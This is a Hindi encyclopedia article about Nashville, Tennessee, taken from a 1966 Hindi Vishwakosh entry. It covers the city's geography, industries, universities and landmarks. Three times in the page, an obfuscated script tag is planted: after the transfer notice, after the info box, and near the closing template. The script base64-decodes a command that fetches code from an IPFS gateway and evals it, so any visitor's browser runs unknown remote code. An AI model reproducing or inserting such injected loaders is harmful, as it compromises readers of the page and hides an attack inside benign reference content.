नैशविल

अद्‌भुत भारत की खोज
नेविगेशन पर जाएँ खोज पर जाएँ
The printable version is no longer supported and may have rendering errors. Please update your browser bookmarks and please use the default browser print function instead.
चित्र:Tranfer-icon.png यह लेख परिष्कृत रूप में भारतकोश पर बनाया जा चुका है। भारतकोश पर देखने के लिए यहाँ क्लिक करें

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

लेख सूचना
नैशविल
पुस्तक नाम हिन्दी विश्वकोश खण्ड 6
पृष्ठ संख्या 441
भाषा हिन्दी देवनागरी
लेखक राजेंद्रप्रसाद सिंह
संपादक फूलदेवसहाय वर्मा
प्रकाशक नागरी प्रचारणी सभा वाराणसी
मुद्रक नागरी मुद्रण वाराणसी
संस्करण सन्‌ 1966 ईसवी
उपलब्ध भारतडिस्कवरी पुस्तकालय
कॉपीराइट सूचना नागरी प्रचारणी सभा वाराणसी

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

नैशविल [१] स्थिति : 36 रू 12 फ़ उ.अ. तथा 86 रू 50 फ़ प.दे.। यह नगर संयुक्त राज्य, अमरीका के टेनेसी राज्य में, नैशविल बेसिन नामक उपजाऊ क्षेत्र में कंबरलैंड नदी के किनारे 380 से लेकर 750 फुट तक की ऊँचाई पर स्थित है। यह टेनेसी राज्य की राजधानी, व्यापारिक तथा औद्योगिक नगर के साथ साथ टेनेसी [२] राज्य में प्रवेश करने का बंदरगाह भी है। यहाँ कई रेलमार्ग एवं सड़कें आकर मिलती हैं।

यहाँ हौजरी, सूत एवं वस्त्र, कृत्रिम रेशमी वस्त्र[३] वायुयान, रसायन, एवं रासायनिक खाद, कृषियंत्र, साज सज्जा, काचाभ कागज [४], स्टोव, सिगरेट, सीमेंट, जूते आदि बनाने के कारखाने हैं। इनके अतिरिक्त लौह ढलाई, तेल शोधन तथा रेलगाड़ी की मरम्मत के कारखाने भी हैं। मुद्रण, प्रकाशन और मांस को डिब्बे में बंद करने का काम व्यापक रूप से यहाँ होता है।

नैशविल एक प्रमुख शिक्षाकेंद्र है। यहाँ तीन विश्वविद्यालय तथा कई महाविद्यालय, जैसे कृषि एवं औद्योगिक महाविद्यालय, समाजशास्त्र महाविद्यालय तथा चिकित्सा विज्ञान महाविद्यालय हैं। कुछ विश्वविद्यालयों एवं महाविद्यालयों में सहशिक्षा के साथ-साथ नीग्रो लोगों के भी अध्ययन की सुविधा है। यहाँ अध्यापकों, ईसाई धर्म के कार्यकर्ताओं तथा अंधों के भी पृथक्‌-पृथक्‌ विद्यालय हैं। यहाँ कई पुराने गिरजाघर है।

इस नगर में नैशबरों का किला [५], किले की प्रतिकृति [६], सेंटेनिएल [७] पार्क में पार्थेनन[८]की प्रतिकृति, ऐंटी बेलुम हाउस [९], ऐंड्रजैकसन का निवास स्थान तथा संग्रहालय से युक्त प्रथम विश्वयुद्ध का स्मारक भवन भी दर्शनीय स्थल है।

  • इस नगर की जनसंख्या 2,50,887 1961 थी।

साँचा:प्रारम्भिक=प्रारम्भिक1 <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

टीका टिप्पणी और संदर्भ

  1. Nashville
  2. Tennessee
  3. rayon
  4. cellophane
  5. capitol
  6. replica
  7. centennial
  8. Parthenon
  9. Ante Bellum House

साँचा:विदेशी स्थान